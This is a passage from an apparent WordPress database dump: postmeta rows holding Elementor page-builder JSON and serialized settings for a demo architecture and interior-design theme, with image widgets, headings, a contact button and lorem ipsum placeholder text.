\\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(3345,4782,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(3346,4782,'_elementor_pro_version','3.8.1'),(3347,4782,'_elementor_css','a:6:{s:4:\"time\";i:1685012020;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:0:\"\";i:1;s:7:\"ovaicon\";i:4;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3349,169,'_edit_lock','1695735080:2'),(3350,4645,'_elementor_css','a:6:{s:4:\"time\";i:1685012243;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3351,42,'_edit_lock','1685012558:2'),(3352,4783,'_wpcode_auto_insert','1'),(3353,4783,'_wpcode_auto_insert_number','1'),(3354,4783,'_wpcode_conditional_logic_enabled',''),(3355,4783,'_wpcode_conditional_logic','a:2:{s:4:\"show\";s:4:\"show\";s:6:\"groups\";a:1:{i:0;a:1:{i:0;a:4:{s:4:\"type\";s:4:\"page\";s:6:\"option\";s:8:\"page_url\";s:8:\"relation\";s:1:\"=\";s:5:\"value\";s:0:\"\";}}}}'),(3356,4783,'_wpcode_priority','10'),(3357,4783,'_wpcode_note',''),(3358,4784,'_wp_page_template','elementor_header_footer'),(3359,4784,'_elementor_edit_mode','builder'),(3360,4784,'_elementor_template_type','wp-page'),(3361,4784,'_elementor_version','3.8.1'),(3362,4784,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Philip-Johnson.jpg\",\"id\":1161,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/pexels-lina-kivaka-1841143.jpg\",\"id\":2991,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/armin-djuhic-mcL2f-J74GY-unsplash.jpg\",\"id\":2996,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/minh-pham-OtXADkUh3-I-unsplash.jpg\",\"id\":3001,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"LOREM IPSUM\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">LOREM IPSUM<\\/span><\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 